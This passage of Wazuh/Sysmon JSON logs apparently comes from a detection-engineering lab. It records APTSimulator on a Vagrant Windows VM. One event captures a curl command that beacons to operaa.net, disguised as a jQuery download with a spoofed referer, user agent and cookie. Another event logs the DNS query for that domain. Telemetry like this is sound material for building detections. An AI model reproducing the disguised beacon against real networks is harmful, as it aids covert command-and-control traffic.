"commandLine": "\\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\" -H \\\"Cache-Control: no-cache\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\" -H \\\"Referer: http://code.jquery.com/\\\" -A \\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\" https://operaa.net:443/jquery-3.2.2.min.js",
"integrityLevel": "High",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 12:08:36.397\r\nProcessGuid: {c64152da-f7c4-625f-fb05-000000000c00}\r\nProcessId: 4656\r\nImage: C:\\Users\\vagrant\\simulator\\APTSimulator\\helpers\\curl.exe\r\nFileVersion: -\r\nDescription: -\r\nProduct: -\r\nCompany: -\r\nOriginalFileName: -\r\nCommandLine: \"C:\\Users\\vagrant\\simulator\\APTSimulator\\\\helpers\\curl.exe\" -s -o /dev/null -I -H \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\" -H \"Cache-Control: no-cache\" -H \"Connection: Keep-Alive\" -H \"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\" -H \"Referer: http://code.jquery.com/\" -A \"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\" https://operaa.net:443/jquery-3.2.2.min.js\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T12:08:36.4002847Z",
"eventRecordID": "5962",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T12:08:36.4002847Z\",\"eventRecordID\":\"5962\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 12:08:36.397\\r\\nProcessGuid: {c64152da-f7c4-625f-fb05-000000000c00}\\r\\nProcessId: 4656\\r\\nImage: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe\\r\\nFileVersion: -\\r\\nDescription: -\\r\\nProduct: -\\r\\nCompany: -\\r\\nOriginalFileName: -\\r\\nCommandLine: \\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\" -H \\\"Cache-Control: no-cache\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\" -H \\\"Referer: http://code.jquery.com/\\\" -A \\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\" https://operaa.net:443/jquery-3.2.2.min.js\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: 
SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 12:08:36.397\",\"processGuid\":\"{c64152da-f7c4-625f-fb05-000000000c00}\",\"processId\":\"4656\",\"image\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\helpers\\\\\\\\curl.exe\",\"commandLine\":\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\\\\\\\\helpers\\\\\\\\curl.exe\\\\\\\" -s -o /dev/null -I -H \\\\\\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\\\\\" -H \\\\\\\"Cache-Control: no-cache\\\\\\\" -H \\\\\\\"Connection: Keep-Alive\\\\\\\" -H \\\\\\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\\\\\" -H \\\\\\\"Referer: http://code.jquery.com/\\\\\\\" -A \\\\\\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\\\\\" 
https://operaa.net:443/jquery-3.2.2.min.js\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T12:09:03.206Z",
"location": "EventChannel",
"id": "1650456543.1005103",
"timestamp": "2022-04-20T12:09:03.206+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T12:09:03.206Z"
],
"timestamp": [
"2022-04-20T12:09:03.206Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650456543206
]
}
DNS request by an unknown process
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "d13gRoABWZBNLY4mUsOi",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "<unknown process>",
"processGuid": "{00000000-0000-0000-0000-000000000000}",
"queryStatus": "9003",
"processId": "4656",
"utcTime": "2022-04-20 12:08:14.567",
"queryName": "operaa.net",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "22",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Dns query:\r\nRuleName: -\r\nUtcTime: 2022-04-20 12:08:14.567\r\nProcessGuid: {00000000-0000-0000-0000-000000000000}\r\nProcessId: 4656\r\nQueryName: operaa.net\r\nQueryStatus: 9003\r\nQueryResults: -\r\nImage: <unknown process>\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T12:08:38.7490769Z",
"eventRecordID": "5965",
"threadID": "7544",
"computer": "DESKTOP-VAEP8K1",
"task": "22",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"22\",\"version\":\"5\",\"level\":\"4\",\"task\":\"22\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T12:08:38.7490769Z\",\"eventRecordID\":\"5965\",\"processID\":\"5964\",\"threadID\":\"7544\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Dns query:\\r\\nRuleName: -\\r\\nUtcTime: 2022-04-20 12:08:14.567\\r\\nProcessGuid: {00000000-0000-0000-0000-000000000000}\\r\\nProcessId: 4656\\r\\nQueryName: operaa.net\\r\\nQueryStatus: 9003\\r\\nQueryResults: -\\r\\nImage: <unknown process>\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"utcTime\":\"2022-04-20 12:08:14.567\",\"processGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"processId\":\"4656\",\"queryName\":\"operaa.net\",\"queryStatus\":\"9003\",\"image\":\"<unknown process>\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T12:09:05.300Z",
"location": "EventChannel",
"id": "1650456545.1005103",
"timestamp": "2022-04-20T12:09:05.300+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T12:09:05.300Z"
],
"timestamp": [
"2022-04-20T12:09:05.300Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650456545300
]
}
MSSE-1337-server
Rules written.